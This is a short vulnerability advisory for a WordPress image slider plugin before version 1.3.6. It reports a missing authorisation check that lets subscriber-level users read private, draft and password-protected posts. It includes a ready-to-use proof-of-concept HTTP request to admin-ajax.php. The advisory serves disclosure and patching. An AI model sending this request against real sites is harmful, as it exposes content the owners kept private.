Responsive Image Slider, Photo Gallery And Carousel < 1.3.6 – Subscriber+ Arbitrary Post Access

Description

The plugin does not have proper authorisation check in the sf_image_id AJAX action, which could allow any authenticated, such as subscriber, to view the content and title of arbitrary posts, for example private, draft and password protected ones.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 55
Connection: close
Cookie: [any authenticated user]

action=sf_image_id&sf_attachment_id=1055&sf_slider_id=a

The post content will be displayed in the Slide Description textarea, the Post title in the Slide Title value attribute